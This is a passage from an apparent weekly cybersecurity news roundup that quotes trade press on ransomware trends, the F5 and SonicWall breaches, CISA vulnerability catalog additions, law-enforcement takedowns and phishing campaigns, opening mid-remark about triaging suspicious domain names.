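Hyphenation by itself is not malicious (my-photo-blog.example stays below the threshold), so this is a triage queue for analysts or a feed into a brand-monitoring workflow, not a blocklist. In practice you would add the hosting geography the article reports (US, China, Singapore IP space) and registration age as further enrichment fields.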
  • HelpNetSecurity explains how “attackers turn trusted OAuth apps into cloud backdoors.”
  • Cybersecurity Dive points out that “social engineering gains ground as preferred method of initial access [for cyberattacks]. Senior executives and high-net-worth individuals are increasingly at risk as hackers use deepfakes, voice cloning and other tactics for targeted attacks.”

From the ransomware front,

  • The HIPAA Journal reports,
    • “Ransomware groups are conducting fewer attacks than a year ago and are increasingly adopting a more targeted approach using stealthy tactics to achieve more impactful results, according to the 2025 Global Threat Landscape Report from the network detection and response (NDR) company ExtraHop.
    • “Indiscriminate attacks are being dropped in favor of targeted, sophisticated attacks that allow ransomware actors to spend longer inside victims’ networks as they move undetected to achieve an extensive compromise before deploying their file-encrypting payloads. Attacks are designed to cause maximum damage and extensive downtime, which both increases the likelihood of a ransom being paid and allows them to obtain higher ransom payments.
    • “ExtraHop reports that in the space of a year, the average ransom demand has increased by more than one million dollars, from $2.5 million a year ago to $3.6 million, although ransom demands are higher for healthcare organizations and government entities. 70% of victims end up paying the ransom.
    • “Last year, ExtraHop tracked an average of 8 incidents per organization compared to 5-6 incidents this year. Ransomware actors typically have access to victims’ networks for almost two weeks before they launch their attack, during which time sensitive data is exfiltrated. It typically takes victims more than two weeks to respond to a security alert and contain an attack, with the attacks causing an average downtime of around 37 hours.”
  • CSO adds,
    • “Two in five companies that pay cybercriminals for ransomware decryption fail to recover data as a result, according to a survey of 1,000s SMEs by insurance provider Hiscox.
    • “The survey also revealed that ransomware remains a major threat, with 27% of businesses surveyed reporting an attack in the past year. Of those affected, 80% — which includes both insured and uninsured businesses — paid a ransom in an attempt to recover or protect critical data.
    • “But only 60% successfully recovered all or part of their data as a result, Hiscox’s Cyber Readiness Report found.”
  • and
    • “As ransomware attacks accelerate in speed and sophistication, 38% of security leaders rank AI-enabled ransomware as their top concern — the most frequently cited worry about AI-related security issues according to CSO’s new 2025 Security Priorities study.
    • “That concern appears to already be well founded, as a second study released today, CrowdStrike’s 2025 State of Ransomware Survey, provides a snapshot of how the ransomware threat is evolving, revealing cybersecurity pros’ fears surrounding the use of AI in ransomware attack chains, as well as the need for CISOs to build better — and more intelligent — defenses to match AI-powered attackers.
    • “From malware development to social engineering, adversaries are weaponizing AI to accelerate every stage of attacks, collapsing the defender’s window of response,” Elia Zaitsev, CTO at CrowdStrike, said in announcing the survey’s findings. “The 2025 State of Ransomware Survey reinforces that legacy defenses can’t match the speed or sophistication of AI-driven attacks. Time is the currency of modern cyber defense — and in today’s AI-driven threat landscape, every second counts.”
  • Cybersecurity Dive seconds the CSO report,
    • “The vast majority of ransomware-as-a-service groups are using AI-powered tools, which are “almost certainly increasing the speed of ransomware attacks,” the security firm ReliaQuest said in a report published on Tuesday.
    • “One sign that automation is making a difference: Attackers’ breakout time — the measure of how long it took them to go from initial access to compromising other devices — dropped from 48 minutes in 2024 to 18 minutes in the middle of 2025, the company said.
    • “RaaS groups are offering AI-powered tools such as antivirus detection and “features to automatically kill software that prevents ransomware execution,” according to the report.”
  • Per Industrial Cyber,
    • “Trend Micro researchers identified the Agenda ransomware group, also known as Qilin, deploying a Linux-based ransomware binary on Windows hosts by exploiting legitimate remote management and file transfer tools. This cross-platform approach bypasses Windows-focused detections and conventional endpoint security solutions. The technique allows low-noise operations, including theft of backup credentials to disable recovery options and neutralization of endpoint defenses using BYOVD (Bring Your Own Vulnerable Driver) attacks.
    • “Since January 2025, Agenda ransomware has affected 591 victims across 58 countries, primarily in developed markets and high-value industries. Most victims were in the U.S., Canada, and the U.K., with manufacturing, technology, financial services, and healthcare among the hardest hit. Any environment using remote access platforms, centralized backup solutions, or hybrid Windows/Linux infrastructures is at risk. Enterprises are advised to restrict remote access tools to authorized hosts and continuously monitor for unusual activity.”
  • Per SC Media,
    • “HackRead reports that U.S. multinational media and telecommunications conglomerate Comcast Corporation had 186.36 GB of compressed data, amounting to 834 GB of stolen information, exposed by the Medusa ransomware gang following its refusal to pay the $1.2 million ransom demand.
    • “Medusa has posted the data for download in 47 files, with most of the files sized at 4 GB. Earlier analysis of the data sample posted by Medusa in late September showed Excel files indicating claim data specifications, as well as multiple auto premium impact analysis-related Python and SQL scripts, according to Cybernews researchers.
    • “Comcast has yet to acknowledge Medusa’s posting. Such a development comes just weeks after Medusa was noted by Microsoft to have launched attacks leveraging the maximum severity GoAnywhere MFT flaw, tracked as CVE-2025-10035, to facilitate unauthenticated remote code execution.”

From the cybersecurity industry and defenses front,

  • Cyberscoop reports,
    • “Veeam announced Tuesday [October 21] it agreed to acquire Securiti AI for $1.725 billion, marking the data protection company’s largest acquisition and its entry into the artificial intelligence security market as enterprises struggle to deploy AI systems safely.
    • “The deal, expected to close in early December, comes as organizations face mounting challenges in managing data across fragmented systems while attempting to launch AI initiatives.
    • “Securiti AI, based in San Jose, Calif., specializes in data security management and provides tools that help organizations understand what data they have, who can access it, and how it’s being used across hybrid cloud environments. The company uses a knowledge graph to map relationships between data assets, users, AI models and compliance requirements.
    • “Veeam, headquartered in Kirkland, Wash., makes software for backing up and recovering data after ransomware attacks and other breaches. The combination aims to address what both companies describe as a critical gap: enterprises cannot safely deploy AI without knowing whether the data feeding those systems is secure, properly governed and accessible only to authorized users.”
  • CIO explains why containment is the key to ransomware defense.
    • “Security leaders tasked with thwarting ransomware attacks must leverage containment techniques to prevent breaches from causing widespread chaos.
    • “Containment strategies reduce the blast radius of a cyberthreat by limiting or preventing the lateral movements of an intruder who succeeds in breaking into your network, a topic covered in a recent post.
    • “It’s a strategy that, when properly implemented, can all but eliminate the possibility of a catastrophic ransomware attack, says John Kindervag, chief evangelist at Illumio and the creator of Zero Trust.”
  • Cyberscoop lets us know,
    • “In recent years, the cybersecurity industry has made significant strides in securing endpoints with advanced Endpoint Detection and Response (EDR) solutions, and we have been successful in making life more difficult for our adversaries. 
    • “While this progress is a victory, it has also produced a predictable and dangerous consequence where threat actors are shifting their focus to the network perimeter, a domain often plagued by technical debt and forgotten hardware.
    • “The recent cyber espionage campaign by the China-linked group Salt Typhoon demonstrates this shift. It is the latest in a series of attacks that highlight a dangerous and common thread connecting them to other major adversaries, including Russia’s Static Tundra and various ransomware groups. 
    • “These groups are all exploiting the ghosts in our networks. Old, unpatched, and forgotten routers, VPNs, and firewalls that make up our network perimeter are making very attractive targets. * * *
    • “Not only does this represent an unprecedented level of tactical threat advancement, but it showcases a deep understanding from our adversaries of how U.S. and allied networks are being defended today. These attackers have shown us that they are now capable of operating invisibly within the systems built to protect against them, compromising our national resilience.
    • “This also highlights a critical lesson: a patch is not a time machine. It cannot undo a previous compromise. End-of-Life (EoL) devices forgotten in time are not forgotten by exploit writers after the patches stop. These “forgotten” devices may be out of sight for network administrators, but they are front and center for our adversaries. We must treat them as the critical risks they are.
    • “The path to a stronger national security posture lies in mastering the fundamentals that are too often neglected and establishing a proactive security program to anticipate and counter threats.”
  • Dark Reading points out,
    • “Most successful cyberattacks target end users through social engineering. They also exploit systems left vulnerable due to user errors. This is why securing the human element is crucial to managing cyber-risks in the modern era. 
    • “As recent headlines of data breaches, business disruptions, and threats demonstrate, the situation is dire. Despite the investment in security awareness training programs, many organizations are not receiving what they need. The average security awareness training program remains lackluster, at best, offering semi-annual cookie-cutter modules that drop a few factoids about security trends, hit users with a spot-the-phish game, or even surprise them with a simulation. As long as the click-through rates on phishing emails remain relatively low, the programs are considered successful. 
    • “The poor security outcomes should speak for themselves: This kind of training isn’t helping move the needle on risk.   
    • “Leading organizations are moving beyond the habits of ho-hum programs to deliver training that not only changes users’ insecure behaviors but also empowers them to take actions that boost the organization’s overall defense. One of the most fundamental shifts that effective security training programs are making is that they’re starting to dump the “awareness” label altogether.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • The White House issued a proclamation yesterday about October being Cybersecurity Awareness Month so let’s go.
  • Per Cyberscoop,
    • “European law enforcement dismantled and seized an expansive cybercrime operation used to facilitate phishing attacks via mobile networks for fraud, including account intrusions, credential and financial data theft, Europol said Friday [October 17].
    • “Investigators from Austria, Estonia and Latvia linked the cybercrime networks to more than 3,200 fraud cases, which also involved investment scams and fake emergencies for financial gain. Financial losses amounted to about $5.3 million in Austria and $490,000 in Latvia, authorities said.
    • “The operation dubbed “SIMCARTEL” netted seven arrests and the seizure of 1,200 SIM box devices, which contained 40,000 active SIM cards that were used to conduct various cybercrimes over telecom networks. Officials described the infrastructure as highly sophisticated, adding that the online service it supported provided telephone numbers for criminal activities to people in more than 80 countries.”
  • and
    • “A Massachusetts man who previously pleaded guilty to a cyberattack on PowerSchool, exposing data on tens of millions of students and teachers, was sentenced to four years in prison Tuesday — half the amount federal prosecutors sought in sentencing recommendations submitted to the court.
    • “Matthew Lane, 20, stole data from PowerSchool belonging to nearly 70 million students and teachers, extorted the California-based company for a ransom, which it paid, causing the education software vendor more than $14 million in financial losses, according to prosecutors.
    • “U.S. District Judge Margaret Guzman sentenced Lane to four years in prison, followed by three years of supervised release. Lane was also ordered to pay almost $14.1 million in restitution and a $25,000 fine for crimes involving the attack on PowerSchool and an undisclosed U.S. telecommunications company.”

From the cybersecurity vulnerabilities and breaches front,

  • Cyberscoop reports,
    • “Federal cyber authorities issued an emergency directive Wednesday [October 15] requiring federal agencies to identify and apply security updates to F5 devices after the cybersecurity vendor said a nation-state attacker had long-term, persistent access to its systems.
    • “The order, which mandates federal civilian executive branch agencies take action by Oct. 22, marked the second emergency directive issued by the Cybersecurity and Infrastructure Security Agency in three weeks. CISA issued both of the emergency directives months after impacted vendors were first made aware of attacks on their internal systems or products.
    • “F5 said it first learned of unauthorized access to its systems Aug. 9, resulting in data theft including segments of BIG-IP source code and details on vulnerabilities the company was addressing internally at the time. CISA declined to say when F5 first alerted the agency to the intrusion.
    • “CISA officials said they’re not currently aware of any federal agencies that have been compromised, but similar to the emergency directive issued following an attack spree involving zero-day vulnerabilities affecting Cisco firewalls, they expect the response and mitigation efforts to provide a better understanding of the scope of any potential compromise in federal networks.”
  • and
    • “F5, a company that specializes in application security and delivery technology, disclosed Wednesday that it had been the target of what it’s calling a “highly sophisticated” cyberattack, which it attributes to a nation-state actor. The announcement follows authorization from the U.S. Department of Justice, which allowed F5 to delay public disclosure of the breach under Item 1.05(c) of Form 8-K due to ongoing law enforcement considerations.
    • “According to an 8-K form filed with the Securities and Exchange Commission, the company first became aware of unauthorized access Aug. 9 and initiated standard incident response measures, including enlisting external cybersecurity consultants. In September, the Department of Justice permitted F5 to withhold public disclosure of the breach, which the government allows if a breach is determined to be a “a substantial risk to national security or public safety.”  
    • “Investigators discovered that the threat actor maintained prolonged access to parts of F5’s infrastructure. Systems affected included the BIG-IP product development environment and the company’s engineering knowledge management platform. The unauthorized access resulted in the exfiltration of files, some of which contained segments of BIG-IP source code and details regarding vulnerabilities that the company was actively addressing at the time. It also said the files taken were “configuration or implementation information for a small percentage of customers.”
  • Cybersecurity Dive adds,
    • “More than 600,000 F5 network security devices running the company’s flagship BIG-IP software are sitting unpatched on the internet one day after the company revealed that nation-state hackers had accessed its networks and source code.
    • “The figure, which Palo Alto Networks provided on Thursday [October 16], highlights how many organizations could be vulnerable to cyberattacks exploiting vulnerabilities that the unidentified hackers discovered while roaming through F5’s production environment and developer resources.” * * *
    • “F5, which said on Thursday that it believed it had kicked the hackers out of its networks, is working with government and private-sector cyber experts to further investigate the compromise. CISA ordered federal agencies to promptly patch their affected F5 products and disconnect the devices’ management interfaces from the internet.
    • “The potential impact of this compromise is unique due to the theft of confidential information regarding previously undisclosed vulnerabilities that F5 was actively in the process of patching,” Palo Alto Networks researchers wrote in their blog post. “This data potentially grants threat actors the capacity to exploit vulnerabilities for which no public patch currently exists, which could accelerate the creation of exploits.”
    • “F5 said there was no evidence that the hackers had compromised its source code or software production processes, despite having access to those systems and data.”
  • CISA added six known exploited vulnerabilities to its catalog this week.
    • October 14, 2025
      • CVE-2016-7836 SKYSEA Client View Improper Authentication Vulnerability
      • CVE-2025-6264 Rapid7 Velociraptor Incorrect Default Permissions Vulnerability
      • CVE-2025-24990 Microsoft Windows Untrusted Pointer Dereference Vulnerability
      • CVE-2025-47827 IGEL OS Use of a Key Past its Expiration Date Vulnerability
      • CVE-2025-59230 Microsoft Windows Improper Access Control Vulnerability
        • Security Affairs discusses these KEVs here.
    • October 15, 2025
      • CVE-2025-54253 Adobe Experience Manager Forms Code Execution Vulnerability
        • Security Week discusses this KEV here.
  • Per Cyberscoop,
    • “North Korean operatives that dupe job seekers into installing malicious code on their devices have been spotted using new malware strains and techniques, resulting in the theft of credentials or cryptocurrency and ransomware deployment, according to researchers from Cisco Talos and Google Threat Intelligence Group.
    • “Cisco Talos said it observed an attack linked to Famous Chollima that involved the use of BeaverTail and OtterCookie — separate but complementary malware strains frequently used by the North Korea-aligned threat group. Researchers said their analysis determined the extent to which BeaverTail and OtterCookie have merged and displayed new functionality in recent campaigns. 
    • “GTIG said it observed UNC5342 using EtherHiding, malicious code in the form of JavaScript payloads that turn a public blockchain into a decentralized command and control server. Researchers said UNC5342 incorporated EtherHiding into a North Korea-aligned social engineering campaign previously dubbed Contagious Interview by Palo Alto Networks. 
    • “Cisco and Google both said North Korean threat groups’ use of more specialized and evasive malware underscores the efforts the nation-state attackers are taking to achieve multiple goals while avoiding more common forms of detection.”
  • Per Dark Reading,
    • “Major password managers are being impersonated in a spate of recent phishing attacks, including LastPass, Bitwarden, and 1Password, and enterprise users should be on notice. In a three-week span, all of them have been dealing with impersonation attacks by threat actors trying to con users into handing over their master password — and with it, troves of sensitive credentials.
    • “Password management vendors have long been among hackers’ favorite brands to impersonate, for good reason. Users need to have complete trust in their password managers — after all, nobody would store all of their credentials for all of their accounts in an app they didn’t have total confidence in. Phishers try to exploit that trust.
    • “Because password managers are protected by a single master password, a password reset scam — “Your password has been compromised, click here to reset it” — might engender more fear and urgency in this context than in others with lower stakes (that is, unless the user understands the basic mechanics of how their manager works — namely, that their master password would never be stored online to begin with). And of course, if attackers can get their hands on just that one master password, they can access all of a user’s online accounts, plus all of the huge corporate systems they might afford access to.
    • “Either by coincidence or reflecting a growing trend, password manager phishing attacks have been popping up even more than usual this October, cyber researchers are warning.”
  • Per Bleeping Computer,
    • “Threat actors exploited a recently patched remote code execution vulnerability (CVE-2025-20352) in Cisco networking devices to deploy a rootkit and target unprotected Linux systems.
    • “The security issue leveraged in the attacks affects the Simple Network Management Protocol (SNMP) in Cisco IOS and IOS XE and leads to RCE if the attacker has root privileges.
    • “According to cybersecurity company Trend Micro, the attacks exploited the flaw in Cisco 9400, 9300, and legacy 3750G series devices and deployed rootkits on “older Linux systems that do not have endpoint detection response solutions.”
  • and
    • “Earlier this week, Microsoft patched a vulnerability that was flagged with the “highest ever” severity rating received by an ASP.NET Core security flaw.
    • “This HTTP request smuggling bug (CVE-2025-55315) was found in the Kestrel ASP.NET Core web server, and it enables authenticated attackers to smuggle another HTTP request to hijack other users’ credentials or bypass front-end security controls.
    • “An attacker who successfully exploited this vulnerability could view sensitive information such as other user’s credentials (Confidentiality) and make changes to file contents on the target server (Integrity), and they might be able to force a crash within the server (Availability),” Microsoft said in a Tuesday advisory.”
  • Per InfoSecurity Magazine,
    • “The phishing platform “Whisper 2FA” has rapidly become one of the most active tools used in large-scale credential theft campaigns, according to new research from Barracuda.
    • “Since July 2025, the platform has been responsible for nearly one million phishing attacks targeting accounts across multiple industries, placing it just behind Tycoon and EvilProxy in the global phishing-as-a-service (PhaaS) landscape.
    • “What makes Whisper 2FA stand out is its use of AJAX, a web technology that allows real-time communication between browser and server without page reloads. This enables the phishing kit to repeatedly capture credentials and multi-factor authentication (MFA) codes until it obtains a valid token. 
    • “Unlike typical phishing kits that stop after stealing a password, Whisper 2FA continuously loops through attempts, effectively bypassing MFA protections.
    • “Attackers have been using a range of lures to deliver Whisper 2FA, mimicking brands such as DocuSign, Adobe and Microsoft 365. These phishing emails often use urgent pretexts, such as invoices or voicemail notifications, to prompt users to log in and unknowingly submit their details to attackers.”

From the ransomware front,

  • Microsoft tells us,
    • “In 80% of the cyber incidents Microsoft’s security teams investigated last year, attackers sought to steal data—a trend driven more by financial gain than intelligence gathering. According to the latest Microsoft Digital Defense Report, written with our Chief Information Security Officer Igor Tsyganskiy, over half of cyberattacks with known motives were driven by extortion or ransomware. That’s at least 52% of incidents fueled by financial gain, while attacks focused solely on espionage made up just 4%. Nation-state threats remain a serious and persistent threat, but most of the immediate attacks organizations face today come from opportunistic criminals looking to make a profit.
    • “Every day, Microsoft processes more than 100 trillion signals, blocks approximately 4.5 million new malware attempts, analyzes 38 million identity risk detections, and screens 5 billion emails for malware and phishing. Advances in automation and readily available off-the-shelf tools have enabled cybercriminals—even those with limited technical expertise—to expand their operations significantly. The use of AI has further added to this trend with cybercriminals accelerating malware development and creating more realistic synthetic content, enhancing the efficiency of activities such as phishing and ransomware attacks. As a result, opportunistic malicious actors now target everyone—big or small—making cybercrime a universal, ever-present threat that spills into our daily lives.
    • “In this environment, organizational leaders must treat cybersecurity as a core strategic priority—not just an IT issue—and build resilience into their technology and operations from the ground up. In our sixth annual Microsoft Digital Defense Report, which covers trends from July 2024 through June 2025, we highlight that legacy security measures are no longer enough; we need modern defenses leveraging AI and strong collaboration across industries and governments to keep pace with the threat. For individuals, simple steps like using strong security tools—especially phishing-resistant multifactor authentication (MFA)—makes a big difference, as MFA can block over 99% of identity-based attacks.”
  • HIPAA Journal reports,
    • “Kettering Health has provided an update on its May 20, 2025, ransomware attack. The investigation confirmed that the Interlock ransomware group first gained access to its network on April 9, 2025, and retained access until May 20, 2025, when the attack was detected and the unauthorized access was blocked. During that time, the ransomware group accessed or copied files containing patient information.
    • “Kettering Health has been providing regular updates on its progress recovering from the attack and has now completed its file review. The review confirmed that current and former patients had the following information compromised in the attack: first and last name, contact information, date of birth, Social Security number, patient identification number, medical record number, medical information, treatment information, diagnosis information, health insurance information, driver’s license/state identification number, financial account information, and/or education records.
    • “Kettering Health said it has reviewed its policies, procedures, and processes related to data security and has taken steps to prevent similar incidents in the future. Kettering Health said it is unaware of any misuse of the exposed information and has provided patients with information on how they can protect themselves against identity theft and fraud. Complimentary credit monitoring and identity theft protection services do not appear to have been offered.”
  • The Record adds,
    • “Michigan City, Indiana, has confirmed that a damaging cyber incident three weeks ago that impacted government systems was a ransomware attack.  
    • “The Indiana city located on the south shore of Lake Michigan was forced to take many systems offline on September 23 and initially called it a “network disruption.” 
    • “On Saturday [October 11], the city acknowledged it was hit with a ransomware attack “that affected a portion of the City’s data and impacted municipal employees’ online and telephone access.” * * *
    • “On Monday, the Obscura ransomware gang took credit for the attack and said they stole 450 gigabytes of data. The group claimed that the time on their ransom had expired and that they posted all of the data that was taken during the cyberattack. Obscura emerged last month and has since named more than 15 victims.”
  • Dark Reading points out,
    • “Harvard University confirmed that it fell victim to an attack exploiting the recently disclosed zero-day vulnerability in Oracle’s E-Business Suite (EBS) system.
    • “The critical vulnerability, tracked as CVE-2025-61882, allows an attacker without authentication to remotely access EBS instances. The flaw has been exploited by the notorious Clop ransomware gang in attacks on Oracle customers.   
    • “Harvard is aware of reports that data associated with the University has been obtained as a result of a zero-day vulnerability in the Oracle E-Business Suite system,” the University told Dark Reading. “This issue has impacted many Oracle E-Business Suite customers and is not specific to Harvard. While the investigation is ongoing, we believe that this incident impacts a limited number of parties associated with a small administrative unit.”
  • and
    • “Microsoft disrupted a Rhysida ransomware campaign that used fake Teams binaries signed with digital certificates, including many from Microsoft’s own service. 
    • “In a social media post on X, Microsoft Threat Intelligence on Wednesday said it revoked more than 200 code-signing certificates issued by Azure’s Trusted Signing service. These certificates are sometimes abused by threat actors to make malware appear as if it is legitimate, trusted software.
    • “According to the post, a cybercriminal group tracked by Microsoft as Vanilla Tempest crafted the fake Teams files to drop a backdoor known as “Oyster,” which allowed attackers to eventually deliver Rhysida ransomware in victims’ networks.
    • “Vanilla Tempest, also known as Vice Society, has a track record of targeting healthcare organizations and public schools, though it’s unclear what organizations the group was targeting with its latest campaign.”
  • Wiz notes,
    • “Cloud ransomware targets data and systems in cloud environments by exploiting cloud-native features and APIs rather than just encrypting local files
    • “Attackers have evolved beyond simple encryption to use sophisticated tactics like data exfiltration, deletion, and manipulation of cloud services
    • “Common attack vectors include compromised credentials, misconfigured storage, overly permissive identities, and supply chain compromises
    • “Defending against cloud ransomware requires cloud-native detection and prevention strategies with deep visibility across your entire environment.”

From the cybersecurity defenses front,

  • Cybersecurity Dive reports,
    • “Fortune 500 companies have seen the structure of their security operations teams evolve in recent years, with four of every 10 companies assigning a dedicated, deputy chief information security officer or an equivalent leadership role, according to a report released Thursday from IANS Research and Artico Search. 
    • “A deputy CISO steps in when the CISO is unavailable and is seen as the eventual successor to the CISO in the company’s risk management hierarchy, according to researchers. 
    • “In practical terms, the deputy CISO often either holds a dual role as a functional department head who takes on additional executive leadership responsibility or operates as a chief of staff who also takes on CISO-like responsibilities that the CISO needs to delegate,” Nick Kakolowski, senior research director at IANS Research, told Cybersecurity Dive via email.”
  • Becker's Hospital Review calls attention to six notes about health system efforts to sharpen their cybersecurity as margins narrow.
  • Dark Reading relates,
    • “Agentic AI deployments are becoming an imperative for organizations of all sizes looking to boost productivity and streamline processes, especially as major platforms like Microsoft and Salesforce build agents into their offerings. In the rush to deploy and use these helpers, it’s important that businesses understand that there’s a shared security responsibility between vendor and customer that will be critical to the success of any agentic AI project.
    • “The stakes in ignoring security are potentially high: last month for instance, AI security vendor Noma detailed how it discovered “ForcedLeak,” a critical severity vulnerability chain in Salesforce’s agentic AI offering Agentforce, which could have allowed a threat actor to exfiltrate sensitive CRM data from a customer with improper security controls through an indirect prompt injection attack. Although Salesforce addressed the issue through updates and access control recommendations, ForcedLeak is but one example of the potential for agents to leak sensitive data, either through improper access controls, ingested secrets, or a prompt injection attack.
    • “It’s not an easy task to add agentic AI security to the mix; it’s already challenging enough to determine where responsibility and culpability lie with traditional software and cloud deployments. With something like AI, where the technology can be hastily rolled out (by both vendor and customer alike) and is constantly evolving, establishing those barriers can prove even more complex.” 
       
  • TechRadar explains “how to plan a smooth Windows 10 to Windows 11 migration – even if you missed the October 14th [support] deadline.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cyberscoop tells us,
    • “A top Senate Democrat introduced legislation Thursday to extend and rename an expired information-sharing law, and make it retroactive to cover the lapse that began Oct. 1.
    • “Michigan Sen. Gary Peters, the ranking member of the Homeland Security and Governmental Affairs Committee, introduced the Protecting America from Cyber Threats (PACT) Act, to replace the expired Cybersecurity and Information Sharing Act of 2015 (CISA 2015) that has provided liability protections for organizations that share cyber threat data with each other and the federal government. Industry groups and cyber professionals have called those protections vital, sometimes describing the 2015 law as the most successful cyber legislation ever passed.
    • “The 2015 law shares an acronym with the Cybersecurity and Infrastructure Security Agency, which some Republicans — including the chairman of Peters’ panel, Rand Paul of Kentucky — have accused of engaging in social media censorship. As CISA 2015 has lapsed and Peters has tried to renew it, “some people think that’s a reauthorization of the agency,” Peters told reporters Thursday in explaining the new bill name.” * * *
    • “Michael Daniel, leader of the Cyber Threat Alliance made up of cybersecurity companies, told CyberScoop that his organization hasn’t been affected by the lapse yet, but that’s partially because it’s an organization that was set up with the long term in mind, with a formalized structure that included information-sharing requirements for members.
    • “The lapse might also not immediately affect other organizations, he said, comparing it to the risks of the government shutdown underway.
    • “An hour-long lapse doesn’t really do very much, but the longer it goes on, the more you have time for organizations to say, ‘Well, maybe we need to reconsider what we’re doing, maybe we need to think about it differently,’” Daniel said. “The longer it goes on, you start having questions about, ‘Maybe this thing won’t get reauthorized down the road.’ And once you start questioning the long-term prospects, that’s when people start making changes in their behavior.”
  • The American Hospital Association News (“AHA”) informs us,
    • “The Health Sector Coordinating Council Oct. 7 released its Sector Mapping and Risk Toolkit, created to help health care providers and other organizations visualize key services that support essential health care workflows and determine which of them present critical risk of cyberattack disruption capable of impacting care delivery, operations and liquidity. The toolkit consists of 17 health care workflow maps and usage guidelines and encourages organizations to prioritize their risks, mitigate them where possible and develop recovery and continuity plans for those that cannot be controlled or mitigated.
    • “The SMART initiative was created in April 2024 as a response to the cyberattack on Change Healthcare two months earlier. The AHA contributed to the development of this project, which has helped identify these systemically important, mission-critical services for health care.”
  • AHA President and CEO Rick Pollack writes in the AHA News about his thoughts on this Cybersecurity Awareness Month.
    • “This week, the FBI issued an urgent warning to all users — including hospitals — of a critical security soft spot within Oracle’s E-Business Suite, stating “This is a ‘stop-what-you’re-doing and patch immediately’ vulnerability.”
    • “The vulnerability has allowed cyber bad actors to carry out data theft ransomware attacks. Oracle is offering a patch to address the security problem.
    • “This latest threat reminds us that cybercrime is ever-present, and health care has been the No. 1 target for years. Hospitals and health systems are committed to taking every possible precaution to protect system operability and patients’ personal data, and the good news is their defenses block most attacks.
    • “But no individual hospital can defend against all of these very sophisticated criminal and nation-state sponsored attacks. That’s why we need a whole-of-government approach to preventing and mitigating cyberattacks, including the federal government going after the bad guys as it has effectively done in counterterrorism.
    • “As we observe Cybersecurity Awareness Month this October, we must remain aware that the scope, frequency and sophistication of cyber incursions into health care have increased steadily. The evolving tactics used by bad actors to steal information, encrypt systems, delay and disrupt patient care, and shut down vital systems continue to put patient care and safety at risk.”
  • Dark Reading adds,
    • “Last night [October 9, 2025], the FBI, in coordination with law enforcement in France, seized the latest version of the BreachForums’ underground forum domain, which was converted earlier this month into an extortion site used by Scattered Lapsus$ Hunters, the gang behind the recent high-profile spate of Salesforce data heists.
    • Scattered Lapsus$ Hunters is an apparent combination of the Scattered Spider, Lapsus$, and ShinyHunters cybercriminal groups that first emerged this past summer. It has been busy compromising Salesforce data and claims that Salesforce victims have up until midnight Eastern Time today, Oct. 10, to meet its ransom demands before it will start publishing the stolen records. 
    • “Despite the BreachForums site being taken down, the group’s Tor Dark Web site is still accessible, and will be used to leak the data, the threat actors claimed.
    • “Aside from Salesforce data, Scattered Lapsus$ Hunters claims to have 1 billion records and 39 victim organizations listed on the site with sample data, such as Chanel, Disney and Hulu, Marriott, Google, Toyota, FedEx, and many more.
    • “For its part, Salesforce has issued its own statement, acknowledging the extortion attempts and reiterating that there is no indication that the Salesforce platform itself had been compromised.”

From the cybersecurity vulnerabilities and breaches front,

  • Cyberscoop reports,
    • “A brute-force attack exposed firewall configuration files of every SonicWall customer who used the company’s cloud backup service, the besieged vendor said Wednesday.
    • “An investigation aided by Mandiant confirmed the totality of compromise that occurred when unidentified attackers hit a customer-facing system SonicWall controls. The company previously said less than 5% of its firewall install base stored backup firewall configuration files in the cloud-based service.
    • “SonicWall did not answer questions about the extent to which the investigation revealed a more widespread impact for its customers, or if its assessment of that 5% figure remained accurate. The company initially revised its disclosure to clarify the scope of exposure was less than 5% of firewalls as of Sept. 17 but has since removed that detail from the blog post. 
    • “The investigation confirmed that an unauthorized party accessed firewall configuration backup files for all customers who have used SonicWall’s cloud backup service,” the company said in a statement.” * * *
    • “Fourteen defects affecting the vendor’s products have been added to the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities (KEV) catalog since late 2021. Nine of those defects are known to be used in ransomware campaigns, according to CISA, including a wave of about 40 Akira ransomware attacks between mid-July and early August.
    • “While those attacks were linked to exploited vulnerabilities in SonicWall devices, the latest attack marked a direct hit on SonicWall’s internal infrastructure and practices.”
  • Security Week tells us,
    • “Law firm Williams & Connolly said state-sponsored hackers breached some of its systems and gained access to attorney email accounts.
    • “The prominent Washington, DC-based law firm is known for representing political figures and government officials, including Barack Obama and the Clintons, as well as major companies such as Intel, Samsung, Google, Disney, and Bank of America. 
    • “According to a statement issued by the company, an investigation conducted with the assistance of CrowdStrike showed that the hackers exploited an unspecified zero-day vulnerability to gain access to a “small number” of attorneys’ email accounts. 
    • “The probe showed that the attack was likely the work of a state-sponsored hacker group known to have recently targeted law firms and other companies. 
    • “Williams & Connolly said there was no evidence that confidential client data was stolen or that other parts of its IT system had been compromised. 
    • “While the company’s statement does not mention China, The New York Times learned that Chinese hackers targeted Williams & Connolly, along with other law firms.”
  • The Cybersecurity and Infrastructure Security Agency (CISA) added nine known exploited vulnerabilities to its catalog this week.
  • Per Bleeping Computer,
    • “Threat actors are exploiting a zero-day vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox products, which allows a local attacker to access system files without authentication.
    • “At least three companies have been targeted so far. Although a patch is not yet available, customers can apply mitigations.
    • “CentreStack and Triofox are Gladinet’s business solutions for file sharing and remote access that allow using a company’s own storage as a cloud. According to the vendor, CentreStack “is used by thousands of businesses from over 49 countries.”
  • Cardiovascular Business relates,
    • “The U.S. Food and Drug Administration (FDA) has announced another new recall for Johnson & Johnson MedTech’s Automated Impella Controller (AIC) due to a significant cybersecurity risk. 
    • “If the identified cybersecurity vulnerabilities are exploited, it may affect the essential performance of the AIC,” according to the FDA’s advisory.
    • “At this time, no cyberattacks have been tied to this specific issue. This is the fourth time in three months the FDA has shared serious safety concerns related to these devices, which serve as the primary user control interface for Impella catheters.” 
  • Per Cybersecurity Dive,
    • “AI isn’t yet transforming how hackers launch phishing attacks, although it is helping them clean up their lures, the security firm Intel 471 said in a report published on Wednesday.
    • “Several factors have combined to keep AI in an evolutionary rather than revolutionary role, the report found.
    • “Still, business and government leaders need to pay attention to several increasingly common AI-assisted attack strategies.”

From the ransomware front,

  • Sophos shares its 2025 report on the state of ransomware in healthcare.
